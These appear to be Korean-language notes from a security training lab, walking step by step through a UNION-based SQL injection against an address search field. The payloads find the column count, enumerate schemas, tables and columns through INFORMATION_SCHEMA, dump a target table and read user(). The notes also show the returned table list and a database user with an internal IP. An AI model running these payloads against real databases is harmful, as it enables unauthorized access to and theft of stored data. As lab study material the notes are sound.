예상 쿼리문: select * from ADDR where addr='%<역삼동%' and '%'='>%';

<공격 구문> 역삼동%' _공격_; #

1> 테이블 컬럼 개수 찾기
>> 역삼동%' order by 5; #
현재 컬럼 개수 5개 (6개부터는 결과가 없다고 나옴)

2> 테이블 컬럼 위치 파악 
>> union select null,table_name,null,null,null from table_schema = database() // 현재 접속 중인 데이터베이스 찾기 (table_schema: 테이블이 속한 스키마(데이터베이스)의 이름)
역삼동%' union select null,table_name,null,null,null from INFORMATION_SCHEMA.tables where table_schema = database(); #

<공격 구문> 역삼동%' union select null,_원하는값_,null,null,null from _값_
3> 테이블에 대한 컬럼 파악
원하는값: column_name _값_: information_schema.columns where table_name='union_answer'
역삼동%' union select null,column_name,null,null,null from information_schema.columns where table_name='union_answer'; #

4> 컬럼 안의 데이터 파악
원하는 값: answer_column, _값_: union_answer
역삼동%' union select null,answer_column,null,null,null from union_answer; #


===========================================================[추가 테스트]===========================================================

++ 추가로.. >> 역삼동%' union select null,_원하는값_,null,null,null from _값_
검색: 역삼동%' union select null,schema_name,null,null,null from information_schema.tables; #
검색: 역삼동%' union select user(),null,null,null,null; #
>> user(): answer2_table@10.233.65.192	

검색: 역삼동%' union select TABLE_SCHEMA,TABLE_NAME,null,null,null from information_schema.tables where table_schema != 'information_schema' #

135-080	서울 강남구 역삼동
skinfosec	access_log
skinfosec	comm_file
skinfosec	comm_mdi_file
skinfosec	member
skinfosec	notice
skinfosec	union_answer
skinfosec	zipcode